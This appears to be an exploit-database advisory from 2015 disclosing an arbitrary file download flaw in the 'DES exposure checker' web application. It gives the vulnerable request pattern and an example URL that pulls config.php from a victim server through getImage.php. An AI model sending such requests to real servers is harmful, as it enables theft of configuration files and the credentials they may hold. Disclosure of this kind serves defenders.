DES exposure checker - Arbitary File Download Vulnerability

2015-02-08T00:00:00
ID 1337DAY-ID-23255
Type zdt
Reporter Conslight
Modified 2015-02-08T00:00:00

Description

DES exposure checker is a free web application, used to see how real DES images look.

                                        
                                            This vulnerability allow kind of user can to download a file from the distant server, like PHP files, TXT file, etc.

Theory : http://{SERVER}/getImage.php?name={FILE.EXT}

Example : http://victim.com/getImage.php?name=config.php

#  0day.today [2018-04-14]  #